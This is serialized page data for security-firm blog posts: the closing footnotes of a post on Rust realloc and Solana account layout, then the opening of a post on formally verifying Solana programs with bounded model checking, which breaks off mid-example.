std",{"type":24,"tag":301,"props":25117,"children":25118},{"style":385},[25119],{"type":30,"value":10308},{"type":24,"tag":301,"props":25121,"children":25122},{"style":359},[25123],{"type":30,"value":22103},{"type":24,"tag":301,"props":25125,"children":25126},{"style":385},[25127],{"type":30,"value":10308},{"type":24,"tag":301,"props":25129,"children":25130},{"style":314},[25131],{"type":30,"value":25132},"from_raw_parts_mut",{"type":24,"tag":301,"props":25134,"children":25135},{"style":359},[25136],{"type":30,"value":362},{"type":24,"tag":301,"props":25138,"children":25139},{"style":369},[25140],{"type":30,"value":22103},{"type":24,"tag":301,"props":25142,"children":25143},{"style":385},[25144],{"type":30,"value":206},{"type":24,"tag":301,"props":25146,"children":25147},{"style":314},[25148],{"type":30,"value":20681},{"type":24,"tag":301,"props":25150,"children":25151},{"style":359},[25152],{"type":30,"value":25153},"(), ",{"type":24,"tag":301,"props":25155,"children":25156},{"style":369},[25157],{"type":30,"value":20516},{"type":24,"tag":301,"props":25159,"children":25160},{"style":359},[25161],{"type":30,"value":21537},{"type":24,"tag":32,"props":25163,"children":25164},{},[25165,25167,25172,25174,25179,25181,25186,25188],{"type":30,"value":25166},"No more pointer casting except for the one place that actually needs it (since the ABI for the serialized buffer uses a ",{"type":24,"tag":145,"props":25168,"children":25170},{"className":25169},[],[25171],{"type":30,"value":14857},{"type":30,"value":25173}," and not a ",{"type":24,"tag":145,"props":25175,"children":25177},{"className":25176},[],[25178],{"type":30,"value":23383},{"type":30,"value":25180}," for the size field, given that ",{"type":24,"tag":145,"props":25182,"children":25184},{"className":25183},[],[25185],{"type":30,"value":23383},{"type":30,"value":25187}," is architecture-dependent), and no dependency on slice reference internals!",{"type":24,"tag":22262,"props":25189,"children":25190},{},[25191],{"type":24,"tag":188,"props":25192,"children":25196},{"href":25193,"ariaDescribedBy":25194,"dataFootnoteRef":7,"id":25195},"#user-content-fn-slice-unbound-lifetime",[22269],"user-content-fnref-slice-unbound-lifetime",[25197],{"type":30,"value":25198},"6",{"type":24,"tag":25200,"props":25201,"children":25204},"section",{"className":25202,"dataFootnotes":7},[25203],"footnotes",[25205,25212],{"type":24,"tag":43,"props":25206,"children":25209},{"className":25207,"id":22269},[25208],"sr-only",[25210],{"type":30,"value":25211},"Footnotes",{"type":24,"tag":6246,"props":25213,"children":25214},{},[25215,25319,25337,25392,25405,25433],{"type":24,"tag":2659,"props":25216,"children":25218},{"id":25217},"user-content-fn-rc-refs",[25219,25221,25227,25229,25234,25236,25240,25242,25246,25248,25253,25255,25261,25263,25268,25270,25280,25282,25287,25289,25294,25296,25301,25303,25309,25310],{"type":30,"value":25220},"I find it helpful to view owning an ",{"type":24,"tag":145,"props":25222,"children":25224},{"className":25223},[],[25225],{"type":30,"value":25226},"Rc\u003CT>",{"type":30,"value":25228}," as holding a shared reference to the underlying ",{"type":24,"tag":145,"props":25230,"children":25232},{"className":25231},[],[25233],{"type":30,"value":12807},{"type":30,"value":25235}," (stored in the magical land of I-don't-need-to-care-about-this-object-not-living-long-enough known as the heap). Owning the ",{"type":24,"tag":5422,"props":25237,"children":25238},{},[25239],{"type":30,"value":23244},{"type":30,"value":25241}," ensures that the actual ",{"type":24,"tag":5422,"props":25243,"children":25244},{},[25245],{"type":30,"value":10528},{"type":30,"value":25247}," stays alive, however all you have is a reference to the ",{"type":24,"tag":145,"props":25249,"children":25251},{"className":25250},[],[25252],{"type":30,"value":12807},{"type":30,"value":25254}," (through the ",{"type":24,"tag":145,"props":25256,"children":25258},{"className":25257},[],[25259],{"type":30,"value":25260},"Deref\u003CTarget = T>",{"type":30,"value":25262}," impl) - ",{"type":24,"tag":5422,"props":25264,"children":25265},{},[25266],{"type":30,"value":25267},"not",{"type":30,"value":25269}," ownership ",{"type":24,"tag":5422,"props":25271,"children":25272},{},[25273,25275],{"type":30,"value":25274},"of the ",{"type":24,"tag":145,"props":25276,"children":25278},{"className":25277},[],[25279],{"type":30,"value":12807},{"type":30,"value":25281},". In short, owning an ",{"type":24,"tag":145,"props":25283,"children":25285},{"className":25284},[],[25286],{"type":30,"value":25226},{"type":30,"value":25288}," is owning a (shared, read-only) reference to ",{"type":24,"tag":145,"props":25290,"children":25292},{"className":25291},[],[25293],{"type":30,"value":12807},{"type":30,"value":25295},", not owning ",{"type":24,"tag":145,"props":25297,"children":25299},{"className":25298},[],[25300],{"type":30,"value":12807},{"type":30,"value":25302}," directly like with ",{"type":24,"tag":145,"props":25304,"children":25306},{"className":25305},[],[25307],{"type":30,"value":25308},"Box\u003CT>",{"type":30,"value":6319},{"type":24,"tag":188,"props":25311,"children":25316},{"href":25312,"ariaLabel":25313,"className":25314,"dataFootnoteBackref":7},"#user-content-fnref-rc-refs","Back to reference 1",[25315],"data-footnote-backref",[25317],{"type":30,"value":25318},"↩",{"type":24,"tag":2659,"props":25320,"children":25322},{"id":25321},"user-content-fn-sendsync",[25323,25329,25330],{"type":24,"tag":145,"props":25324,"children":25326},{"className":25325},[],[25327],{"type":30,"value":25328},"!Send + !Sync",{"type":30,"value":13277},{"type":24,"tag":188,"props":25331,"children":25335},{"href":25332,"ariaLabel":25333,"className":25334,"dataFootnoteBackref":7},"#user-content-fnref-sendsync","Back to reference 2",[25315],[25336],{"type":30,"value":25318},{"type":24,"tag":2659,"props":25338,"children":25340},{"id":25339},"user-content-fn-layout",[25341,25343,25348,25349,25362,25364,25369,25371,25376,25378,25383,25385],{"type":30,"value":25342},"Note that this is a terrible idea for yet another reason: ",{"type":24,"tag":145,"props":25344,"children":25346},{"className":25345},[],[25347],{"type":30,"value":21729},{"type":30,"value":5945},{"type":24,"tag":188,"props":25350,"children":25353},{"href":25351,"rel":25352},"https://docs.rs/solana-program/1.10.30/src/solana_program/account_info.rs.html#15-33",[192],[25354,25356],{"type":30,"value":25355},"not declared with ",{"type":24,"tag":145,"props":25357,"children":25359},{"className":25358},[],[25360],{"type":30,"value":25361},"#[repr(C)]",{"type":30,"value":25363},", meaning that, once again, we're dealing with no layout guarantees. But thanks to the power of blockchain, fixing this ABI interface ",{"type":24,"tag":5422,"props":25365,"children":25366},{},[25367],{"type":30,"value":25368},"breaks the entire chain",{"type":30,"value":25370}," since old contracts will no longer work. So, we're stuck with cobbling together ",{"type":24,"tag":5422,"props":25372,"children":25373},{},[25374],{"type":30,"value":25375},"some",{"type":30,"value":25377}," kind of interface to the specific layout of the specific ",{"type":24,"tag":145,"props":25379,"children":25381},{"className":25380},[],[25382],{"type":30,"value":23296},{"type":30,"value":25384}," versions used to build on-chain code for all eternity... ",{"type":24,"tag":188,"props":25386,"children":25390},{"href":25387,"ariaLabel":25388,"className":25389,"dataFootnoteBackref":7},"#user-content-fnref-layout","Back to reference 3",[25315],[25391],{"type":30,"value":25318},{"type":24,"tag":2659,"props":25393,"children":25395},{"id":25394},"user-content-fn-rustc-llvm",[25396,25398],{"type":30,"value":25397},"Actually, it's LLVM that does the optimization ",{"type":24,"tag":188,"props":25399,"children":25403},{"href":25400,"ariaLabel":25401,"className":25402,"dataFootnoteBackref":7},"#user-content-fnref-rustc-llvm","Back to reference 4",[25315],[25404],{"type":30,"value":25318},{"type":24,"tag":2659,"props":25406,"children":25408},{"id":25407},"user-content-fn-godbolt",[25409,25416,25418,25424,25426],{"type":24,"tag":188,"props":25410,"children":25413},{"href":25411,"rel":25412},"https://godbolt.org/z/PK46xMbxc",[192],[25414],{"type":30,"value":25415},"Click here",{"type":30,"value":25417}," for a Compiler Explorer link showing this - note that the code for both implementations is almost identical. And yes, it's x86_64 and not eBPF, but unfortunately Compiler Explorer doesn't have Rust ",{"type":24,"tag":145,"props":25419,"children":25421},{"className":25420},[],[25422],{"type":30,"value":25423},"libcore",{"type":30,"value":25425}," available for other architectures yet. ",{"type":24,"tag":188,"props":25427,"children":25431},{"href":25428,"ariaLabel":25429,"className":25430,"dataFootnoteBackref":7},"#user-content-fnref-godbolt","Back to reference 5",[25315],[25432],{"type":30,"value":25318},{"type":24,"tag":2659,"props":25434,"children":25436},{"id":25435},"user-content-fn-slice-unbound-lifetime",[25437,25439,25444,25446,25452,25454,25460,25462,25468,25470,25476,25478,25484,25486,25491,25493],{"type":30,"value":25438},"The astute reader may have noticed that ",{"type":24,"tag":145,"props":25440,"children":25442},{"className":25441},[],[25443],{"type":30,"value":25132},{"type":30,"value":25445}," still returns an unbounded lifetime (notice in the signature ",{"type":24,"tag":145,"props":25447,"children":25449},{"className":25448},[],[25450],{"type":30,"value":25451},"unsafe fn from_raw_parts_mut\u003C'a, T>(data: *mut T, len: usize) -> &'a mut [T]",{"type":30,"value":25453},", the lifetime parameter ",{"type":24,"tag":145,"props":25455,"children":25457},{"className":25456},[],[25458],{"type":30,"value":25459},"'a",{"type":30,"value":25461}," does not appear in the arguments). However, we immediately constrain the lifetime by assigning it to ",{"type":24,"tag":145,"props":25463,"children":25465},{"className":25464},[],[25466],{"type":30,"value":25467},"*slice",{"type":30,"value":25469},", which is ",{"type":24,"tag":145,"props":25471,"children":25473},{"className":25472},[],[25474],{"type":30,"value":25475},"&'info [u8]",{"type":30,"value":25477}," (where ",{"type":24,"tag":145,"props":25479,"children":25481},{"className":25480},[],[25482],{"type":30,"value":25483},"'info",{"type":30,"value":25485}," is the lifetime parameter of the ",{"type":24,"tag":145,"props":25487,"children":25489},{"className":25488},[],[25490],{"type":30,"value":21729},{"type":30,"value":25492}," struct) - this is exactly the lifetime we started with. ",{"type":24,"tag":188,"props":25494,"children":25498},{"href":25495,"ariaLabel":25496,"className":25497,"dataFootnoteBackref":7},"#user-content-fnref-slice-unbound-lifetime","Back to reference 6",[25315],[25499],{"type":30,"value":25318},{"type":24,"tag":9672,"props":25501,"children":25502},{},[25503],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":25505},[25506,25512,25516,25517,25519],{"id":21160,"depth":320,"text":25507,"children":25508},"Breaking down realloc",[25509,25510],{"id":21326,"depth":335,"text":21329},{"id":22678,"depth":335,"text":25511},"Back to realloc",{"id":23624,"depth":320,"text":23627,"children":25513},[25514,25515],{"id":23630,"depth":335,"text":23633},{"id":23851,"depth":335,"text":23854},{"id":24037,"depth":320,"text":24040},{"id":24437,"depth":320,"text":25518},"Towards safer unsafe",{"id":22269,"depth":320,"text":25211},"content:blog:2022-12-09-rust-realloc-and-references.md","blog/2022-12-09-rust-realloc-and-references.md","blog/2022-12-09-rust-realloc-and-references",{"_path":25524,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":25525,"description":25526,"author":25527,"image":25528,"date":25530,"isFeatured":16,"onBlogPage":16,"tags":25531,"body":25532,"_type":9700,"_id":35755,"_source":9702,"_file":35756,"_stem":35757,"_extension":9705},"/blog/2023-01-26-formally-verifying-solana-programs","Solana Formal Verification: A Case Study","We present a novel framework for formal verification of Solana Anchor programs — and a case study application to the Squads multisig.","harrison",{"src":25529,"height":20417,"width":15},"/posts/formally-verifying-solana-programs/formal-verification-title.jpg","2023-01-26",[9717,9718],{"type":21,"children":25533,"toc":35727},[25534,25539,25544,25570,25573,25585,25608,25631,25643,25666,25669,25675,25724,25730,25736,25741,25752,25793,25798,25804,25809,26040,26060,26065,26070,26142,26147,26217,26231,26653,26673,26679,26698,26703,26708,26713,26719,26731,26766,26777,26788,26800,26805,26836,26860,26879,26885,26902,26908,26935,26940,26960,26972,27118,27146,27149,27161,27244,27263,27266,27305,27471,27476,27482,27494,27512,27525,27686,27698,27711,28185,28190,28237,28243,28261,28330,28568,28782,28787,28861,28909,28914,28920,29022,29126,29131,29192,29197,29203,29268,29273,29315,29341,29347,29416,29421,29471,29482,29488,29499,29520,29525,29530,29553,29559,29571,29591,30685,30703,30754,30759,30767,30778,30783,30791,30796,30812,30848,30853,30947,30952,30960,30965,31077,31082,31090,31103,31267,31272,31280,31285,31290,31358,31392,31398,31403,31414,31432,31810,31822,31834,31842,31853,31884,31889,31897,31902,32175,32194,32199,32225,33093,33105,33204,33216,33258,33263,33275,33283,33288,33300,33326,33486,33497,33505,33510,33786,33791,33803,33958,33978,34304,34338,34532,34565,34577,34699,34719,34724,34729,34734,34747,34755,34760,35235,35247,35252,35264,35269,35528,35554,35559,35565,35571,35583,35595,35614,35661,35666,35672,35677,35682,35687,35691,35696,35701,35704,35723],{"type":24,"tag":32,"props":25535,"children":25536},{},[25537],{"type":30,"value":25538},"Since the early days of computing, bugs have crept their way into programs and wreaked havoc on the intentions of the programmer. Logical fallacies, race conditions, or simple typos could manifest as crashes or lay undetected, silently breaking the functionality of the host program.",{"type":24,"tag":32,"props":25540,"children":25541},{},[25542],{"type":30,"value":25543},"When your program is connected to the internet, there is the new risk that bugs may introduce security holes into your system. Even simple buffer overflows can be exploited by skilled attackers to compromise the integrity of your program.",{"type":24,"tag":32,"props":25545,"children":25546},{},[25547,25549,25553,25555,25560,25562,25569],{"type":30,"value":25548},"In the world of Web3 we create programs that talk to strangers ",{"type":24,"tag":5422,"props":25550,"children":25551},{},[25552],{"type":30,"value":23158},{"type":30,"value":25554}," control millions of dollars 🤑. Bugs in these programs are some of the ",{"type":24,"tag":5422,"props":25556,"children":25557},{},[25558],{"type":30,"value":25559},"juciest",{"type":30,"value":25561},"; anonymous attackers that can find and exploit them will walk away with potentially ",{"type":24,"tag":188,"props":25563,"children":25566},{"href":25564,"rel":25565},"https://rekt.news/leaderboard/",[192],[25567],{"type":30,"value":25568},"hundreds of millions of dollars",{"type":30,"value":206},{"type":24,"tag":2719,"props":25571,"children":25572},{},[],{"type":24,"tag":32,"props":25574,"children":25575},{},[25576,25578,25583],{"type":30,"value":25577},"At OtterSec we are ",{"type":24,"tag":5422,"props":25579,"children":25580},{},[25581],{"type":30,"value":25582},"highly skilled in pest control",{"type":30,"value":25584}," - finding and squashing bugs before they are exploited by less well-intentioned hackers. We are constantly striving to improve our techniques and develop new technologies that aid in our auditing processes.",{"type":24,"tag":32,"props":25586,"children":25587},{},[25588,25590,25597,25599,25606],{"type":30,"value":25589},"Recently we were contacted by the ",{"type":24,"tag":188,"props":25591,"children":25594},{"href":25592,"rel":25593},"https://squads.so/",[192],[25595],{"type":30,"value":25596},"Squads team",{"type":30,"value":25598}," to explore how formal verification could be used to verify security-critical properties of Solana programs. We were really excited about this opportunity and have been developing a prototype with the ",{"type":24,"tag":188,"props":25600,"children":25603},{"href":25601,"rel":25602},"https://github.com/Squads-Protocol/squads-mpl",[192],[25604],{"type":30,"value":25605},"Squads Multisig Program",{"type":30,"value":25607}," as our main case study.",{"type":24,"tag":32,"props":25609,"children":25610},{},[25611,25613,25620,25622,25629],{"type":30,"value":25612},"We now have a (mostly) working prototype that can be used to formally verify critical properties of Solana programs in order to ensure a higher level of security. Our tool integrates with ",{"type":24,"tag":188,"props":25614,"children":25617},{"href":25615,"rel":25616},"https://www.anchor-lang.com/",[192],[25618],{"type":30,"value":25619},"anchor-lang",{"type":30,"value":25621}," and provides new APIs to specify invariants for your Solana code. It then autogenerates proof harnesses which are verified with the ",{"type":24,"tag":188,"props":25623,"children":25626},{"href":25624,"rel":25625},"https://github.com/model-checking/kani",[192],[25627],{"type":30,"value":25628},"Kani Rust Verifier",{"type":30,"value":25630},". Additionally, we are implementing a formal-verification-friendly runtime SDK layer that accelerates the expensive process of running formal verification tools on complex code.",{"type":24,"tag":32,"props":25632,"children":25633},{},[25634,25636,25641],{"type":30,"value":25635},"In this blog post, we're excited to share our progress and the challenges we've encountered during the process. We will describe the main concepts behind ",{"type":24,"tag":5422,"props":25637,"children":25638},{},[25639],{"type":30,"value":25640},"bounded model checking",{"type":30,"value":25642}," (our formal verification method of choice) and explain how we've applied these concepts to Solana.",{"type":24,"tag":32,"props":25644,"children":25645},{},[25646],{"type":24,"tag":5422,"props":25647,"children":25648},{},[25649,25651,25658,25660],{"type":30,"value":25650},"If you're interested in learning more or getting your own programs formally verified, let us know! We'd be excited to chat with you! — Fill out ",{"type":24,"tag":188,"props":25652,"children":25655},{"href":25653,"rel":25654},"https://osec.io/contact",[192],[25656],{"type":30,"value":25657},"this form",{"type":30,"value":25659}," or email us at ",{"type":24,"tag":188,"props":25661,"children":25663},{"href":25662},"mailto:contact@osec.io",[25664],{"type":30,"value":25665},"contact@osec.io",{"type":24,"tag":2719,"props":25667,"children":25668},{},[],{"type":24,"tag":270,"props":25670,"children":25672},{"id":25671},"contents",[25673],{"type":30,"value":25674},"Contents:",{"type":24,"tag":6246,"props":25676,"children":25677},{},[25678,25683,25700,25710,25715,25720],{"type":24,"tag":2659,"props":25679,"children":25680},{},[25681],{"type":30,"value":25682},"Formal Verification with Bounded Model Checking\na. Overview\nb. A simple example\nc. Loop bounds & path explosion\nd. The Kani Rust Verifier",{"type":24,"tag":2659,"props":25684,"children":25685},{},[25686,25691,25693,25698],{"type":24,"tag":60,"props":25687,"children":25688},{},[25689],{"type":30,"value":25690},"Specification",{"type":30,"value":25692},": How can we describe what we ",{"type":24,"tag":5422,"props":25694,"children":25695},{},[25696],{"type":30,"value":25697},"want",{"type":30,"value":25699}," our program to do?",{"type":24,"tag":2659,"props":25701,"children":25702},{},[25703,25708],{"type":24,"tag":60,"props":25704,"children":25705},{},[25706],{"type":30,"value":25707},"Verification",{"type":30,"value":25709},": How do we check that our model is correct?",{"type":24,"tag":2659,"props":25711,"children":25712},{},[25713],{"type":30,"value":25714},"Case Study: Squads Multisig",{"type":24,"tag":2659,"props":25716,"children":25717},{},[25718],{"type":30,"value":25719},"Additional challenges in Solana",{"type":24,"tag":2659,"props":25721,"children":25722},{},[25723],{"type":30,"value":9655},{"type":24,"tag":43,"props":25725,"children":25727},{"id":25726},"formal-verification-with-bounded-model-checking",[25728],{"type":30,"value":25729},"Formal Verification with Bounded Model Checking",{"type":24,"tag":80,"props":25731,"children":25733},{"id":25732},"overview",[25734],{"type":30,"value":25735},"Overview",{"type":24,"tag":32,"props":25737,"children":25738},{},[25739],{"type":30,"value":25740},"Formal verification is the process of using a formal specification to verify the correctness of a system. In this case, the systems we are verifying are programs written in Rust that run on the Solana blockchain.",{"type":24,"tag":32,"props":25742,"children":25743},{},[25744,25746,25751],{"type":30,"value":25745},"There are many different flavors of formal verification, however in this research we are using ",{"type":24,"tag":60,"props":25747,"children":25748},{},[25749],{"type":30,"value":25750},"bounded model checking (BMC)",{"type":30,"value":206},{"type":24,"tag":32,"props":25753,"children":25754},{},[25755,25757,25762,25764,25769,25771,25775,25777,25783,25785,25791],{"type":30,"value":25756},"In short, the idea of BMC is to execute our program ",{"type":24,"tag":5422,"props":25758,"children":25759},{},[25760],{"type":30,"value":25761},"symbolically",{"type":30,"value":25763}," rather than ",{"type":24,"tag":5422,"props":25765,"children":25766},{},[25767],{"type":30,"value":25768},"concretely",{"type":30,"value":25770},". Instead of actually performing an ",{"type":24,"tag":5422,"props":25772,"children":25773},{},[25774],{"type":30,"value":16443},{"type":30,"value":25776}," when we see the line ",{"type":24,"tag":145,"props":25778,"children":25780},{"className":25779},[],[25781],{"type":30,"value":25782},"int x = a + b",{"type":30,"value":25784},", we store the symbolic expression ",{"type":24,"tag":145,"props":25786,"children":25788},{"className":25787},[],[25789],{"type":30,"value":25790},"x == a + b",{"type":30,"value":25792},". We do this for every line and once we reach the end of the program we have compiled a huge list of symbolic expressions. At this point, we can feed these expressions to a SMT solver along with a correctness property P in order to check if our program satisfies this property.",{"type":24,"tag":32,"props":25794,"children":25795},{},[25796],{"type":30,"value":25797},"If we hit a branch as we are tracing the program, we will take both sides of the branch adding the positive branch condition as a constraint to one side and the negative condition to the other side.",{"type":24,"tag":80,"props":25799,"children":25801},{"id":25800},"a-simple-example",[25802],{"type":30,"value":25803},"A simple example",{"type":24,"tag":32,"props":25805,"children":25806},{},[25807],{"type":30,"value":25808},"As an example, consider the following function:",{"type":24,"tag":291,"props":25810,"children":25812},{"code":25811,"language":294,"meta":7,"className":295,"style":7},"int foo(int x) {\n int y = x + 3;\n int z;\n if (y > 100) {\n z = y * 2;\n } else {\n z = y + 1;\n }\n\n // Property P:\n assert(z != 105);\n}\n",[25813],{"type":24,"tag":145,"props":25814,"children":25815},{"__ignoreMap":7},[25816,25845,25878,25890,25915,25943,25958,25985,25992,25999,26007,26033],{"type":24,"tag":301,"props":25817,"children":25818},{"class":303,"line":304},[25819,25823,25828,25832,25836,25841],{"type":24,"tag":301,"props":25820,"children":25821},{"style":348},[25822],{"type":30,"value":351},{"type":24,"tag":301,"props":25824,"children":25825},{"style":314},[25826],{"type":30,"value":25827}," foo",{"type":24,"tag":301,"props":25829,"children":25830},{"style":359},[25831],{"type":30,"value":362},{"type":24,"tag":301,"props":25833,"children":25834},{"style":348},[25835],{"type":30,"value":351},{"type":24,"tag":301,"props":25837,"children":25838},{"style":369},[25839],{"type":30,"value":25840}," x",{"type":24,"tag":301,"props":25842,"children":25843},{"style":359},[25844],{"type":30,"value":398},{"type":24,"tag":301,"props":25846,"children":25847},{"class":303,"line":320},[25848,25852,25856,25860,25865,25869,25874],{"type":24,"tag":301,"props":25849,"children":25850},{"style":348},[25851],{"type":30,"value":407},{"type":24,"tag":301,"props":25853,"children":25854},{"style":359},[25855],{"type":30,"value":11339},{"type":24,"tag":301,"props":25857,"children":25858},{"style":385},[25859],{"type":30,"value":523},{"type":24,"tag":301,"props":25861,"children":25862},{"style":359},[25863],{"type":30,"value":25864}," x ",{"type":24,"tag":301,"props":25866,"children":25867},{"style":385},[25868],{"type":30,"value":11206},{"type":24,"tag":301,"props":25870,"children":25871},{"style":466},[25872],{"type":30,"value":25873}," 3",{"type":24,"tag":301,"props":25875,"children":25876},{"style":359},[25877],{"type":30,"value":492},{"type":24,"tag":301,"props":25879,"children":25880},{"class":303,"line":335},[25881,25885],{"type":24,"tag":301,"props":25882,"children":25883},{"style":348},[25884],{"type":30,"value":407},{"type":24,"tag":301,"props":25886,"children":25887},{"style":359},[25888],{"type":30,"value":25889}," z;\n",{"type":24,"tag":301,"props":25891,"children":25892},{"class":303,"line":344},[25893,25897,25902,25906,25911],{"type":24,"tag":301,"props":25894,"children":25895},{"style":308},[25896],{"type":30,"value":453},{"type":24,"tag":301,"props":25898,"children":25899},{"style":359},[25900],{"type":30,"value":25901}," (y ",{"type":24,"tag":301,"props":25903,"children":25904},{"style":385},[25905],{"type":30,"value":1456},{"type":24,"tag":301,"props":25907,"children":25908},{"style":466},[25909],{"type":30,"value":25910}," 100",{"type":24,"tag":301,"props":25912,"children":25913},{"style":359},[25914],{"type":30,"value":398},{"type":24,"tag":301,"props":25916,"children":25917},{"class":303,"line":401},[25918,25923,25927,25931,25935,25939],{"type":24,"tag":301,"props":25919,"children":25920},{"style":359},[25921],{"type":30,"value":25922}," z ",{"type":24,"tag":301,"props":25924,"children":25925},{"style":385},[25926],{"type":30,"value":523},{"type":24,"tag":301,"props":25928,"children":25929},{"style":359},[25930],{"type":30,"value":11339},{"type":24,"tag":301,"props":25932,"children":25933},{"style":385},[25934],{"type":30,"value":772},{"type":24,"tag":301,"props":25936,"children":25937},{"style":466},[25938],{"type":30,"value":469},{"type":24,"tag":301,"props":25940,"children":25941},{"style":359},[25942],{"type":30,"value":492},{"type":24,"tag":301,"props":25944,"children":25945},{"class":303,"line":415},[25946,25950,25954],{"type":24,"tag":301,"props":25947,"children":25948},{"style":359},[25949],{"type":30,"value":22565},{"type":24,"tag":301,"props":25951,"children":25952},{"style":308},[25953],{"type":30,"value":10144},{"type":24,"tag":301,"props":25955,"children":25956},{"style":359},[25957],{"type":30,"value":3035},{"type":24,"tag":301,"props":25959,"children":25960},{"class":303,"line":439},[25961,25965,25969,25973,25977,25981],{"type":24,"tag":301,"props":25962,"children":25963},{"style":359},[25964],{"type":30,"value":25922},{"type":24,"tag":301,"props":25966,"children":25967},{"style":385},[25968],{"type":30,"value":523},{"type":24,"tag":301,"props":25970,"children":25971},{"style":359},[25972],{"type":30,"value":11339},{"type":24,"tag":301,"props":25974,"children":25975},{"style":385},[25976],{"type":30,"value":11206},{"type":24,"tag":301,"props":25978,"children":25979},{"style":466},[25980],{"type":30,"value":487},{"type":24,"tag":301,"props":25982,"children":25983},{"style":359},[25984],{"type":30,"value":492},{"type":24,"tag":301,"props":25986,"children":25987},{"class":303,"line":447},[25988],{"type":24,"tag":301,"props":25989,"children":25990},{"style":359},[25991],{"type":30,"value":501},{"type":24,"tag":301,"props":25993,"children":25994},{"class":303,"line":476},[25995],{"type":24,"tag":301,"props":25996,"children":25997},{"emptyLinePlaceholder":16},[25998],{"type":30,"value":341},{"type":24,"tag":301,"props":26000,"children":26001},{"class":303,"line":495},[26002],{"type":24,"tag":301,"props":26003,"children":26004},{"style":1062},[26005],{"type":30,"value":26006}," // Property P:\n",{"type":24,"tag":301,"props":26008,"children":26009},{"class":303,"line":504},[26010,26015,26020,26024,26029],{"type":24,"tag":301,"props":26011,"children":26012},{"style":314},[26013],{"type":30,"value":26014}," assert",{"type":24,"tag":301,"props":26016,"children":26017},{"style":359},[26018],{"type":30,"value":26019},"(z ",{"type":24,"tag":301,"props":26021,"children":26022},{"style":385},[26023],{"type":30,"value":463},{"type":24,"tag":301,"props":26025,"children":26026},{"style":466},[26027],{"type":30,"value":26028}," 105",{"type":24,"tag":301,"props":26030,"children":26031},{"style":359},[26032],{"type":30,"value":589},{"type":24,"tag":301,"props":26034,"children":26035},{"class":303,"line":512},[26036],{"type":24,"tag":301,"props":26037,"children":26038},{"style":359},[26039],{"type":30,"value":698},{"type":24,"tag":32,"props":26041,"children":26042},{},[26043,26045,26051,26053,26059],{"type":30,"value":26044},"This function takes an input ",{"type":24,"tag":145,"props":26046,"children":26048},{"className":26047},[],[26049],{"type":30,"value":26050},"x",{"type":30,"value":26052}," and does some computation. At the end of the program, the property we want to verify is that ",{"type":24,"tag":145,"props":26054,"children":26056},{"className":26055},[],[26057],{"type":30,"value":26058},"z != 105",{"type":30,"value":206},{"type":24,"tag":32,"props":26061,"children":26062},{},[26063],{"type":30,"value":26064},"With BMC, we could trace this program and derive the following constraints:",{"type":24,"tag":32,"props":26066,"children":26067},{},[26068],{"type":30,"value":26069},"Positive branch:",{"type":24,"tag":291,"props":26071,"children":26073},{"code":26072,"language":294,"meta":7,"className":295,"style":7},"y == x + 3\ny > 100\nz == y * 2\n",[26074],{"type":24,"tag":145,"props":26075,"children":26076},{"__ignoreMap":7},[26077,26101,26117],{"type":24,"tag":301,"props":26078,"children":26079},{"class":303,"line":304},[26080,26085,26089,26093,26097],{"type":24,"tag":301,"props":26081,"children":26082},{"style":359},[26083],{"type":30,"value":26084},"y ",{"type":24,"tag":301,"props":26086,"children":26087},{"style":385},[26088],{"type":30,"value":607},{"type":24,"tag":301,"props":26090,"children":26091},{"style":359},[26092],{"type":30,"value":25864},{"type":24,"tag":301,"props":26094,"children":26095},{"style":385},[26096],{"type":30,"value":11206},{"type":24,"tag":301,"props":26098,"children":26099},{"style":466},[26100],{"type":30,"value":4203},{"type":24,"tag":301,"props":26102,"children":26103},{"class":303,"line":320},[26104,26108,26112],{"type":24,"tag":301,"props":26105,"children":26106},{"style":359},[26107],{"type":30,"value":26084},{"type":24,"tag":301,"props":26109,"children":26110},{"style":385},[26111],{"type":30,"value":1456},{"type":24,"tag":301,"props":26113,"children":26114},{"style":466},[26115],{"type":30,"value":26116}," 100\n",{"type":24,"tag":301,"props":26118,"children":26119},{"class":303,"line":335},[26120,26125,26129,26133,26137],{"type":24,"tag":301,"props":26121,"children":26122},{"style":359},[26123],{"type":30,"value":26124},"z ",{"type":24,"tag":301,"props":26126,"children":26127},{"style":385},[26128],{"type":30,"value":607},{"type":24,"tag":301,"props":26130,"children":26131},{"style":359},[26132],{"type":30,"value":11339},{"type":24,"tag":301,"props":26134,"children":26135},{"style":385},[26136],{"type":30,"value":772},{"type":24,"tag":301,"props":26138,"children":26139},{"style":466},[26140],{"type":30,"value":26141}," 2\n",{"type":24,"tag":32,"props":26143,"children":26144},{},[26145],{"type":30,"value":26146},"Negative branch:",{"type":24,"tag":291,"props":26148,"children":26150},{"code":26149,"language":294,"meta":7,"className":295,"style":7},"y == x + 3\ny \u003C= 100\nz == y + 1\n",[26151],{"type":24,"tag":145,"props":26152,"children":26153},{"__ignoreMap":7},[26154,26177,26193],{"type":24,"tag":301,"props":26155,"children":26156},{"class":303,"line":304},[26157,26161,26165,26169,26173],{"type":24,"tag":301,"props":26158,"children":26159},{"style":359},[26160],{"type":30,"value":26084},{"type":24,"tag":301,"props":26162,"children":26163},{"style":385},[26164],{"type":30,"value":607},{"type":24,"tag":301,"props":26166,"children":26167},{"style":359},[26168],{"type":30,"value":25864},{"type":24,"tag":301,"props":26170,"children":26171},{"style":385},[26172],{"type":30,"value":11206},{"type":24,"tag":301,"props":26174,"children":26175},{"style":466},[26176],{"type":30,"value":4203},{"type":24,"tag":301,"props":26178,"children":26179},{"class":303,"line":320},[26180,26184,26189],{"type":24,"tag":301,"props":26181,"children":26182},{"style":359},[26183],{"type":30,"value":26084},{"type":24,"tag":301,"props":26185,"children":26186},{"style":385},[26187],{"type":30,"value":26188},"\u003C=",{"type":24,"tag":301,"props":26190,"children":26191},{"style":466},[26192],{"type":30,"value":26116},{"type":24,"tag":301,"props":26194,"children":26195},{"class":303,"line":335},[26196,26200,26204,26208,26212],{"type":24,"tag":301,"props":26197,"children":26198},{"style":359},[26199],{"type":30,"value":26124},{"type":24,"tag":301,"props":26201,"children":26202},{"style":385},[26203],{"type":30,"value":607},{"type":24,"tag":301,"props":26205,"children":26206},{"style":359},[26207],{"type":30,"value":11339},{"type":24,"tag":301,"props":26209,"children":26210},{"style":385},[26211],{"type":30,"value":11206},{"type":24,"tag":301,"props":26213,"children":26214},{"style":466},[26215],{"type":30,"value":26216}," 1\n",{"type":24,"tag":32,"props":26218,"children":26219},{},[26220,26222,26229],{"type":30,"value":26221},"Using the 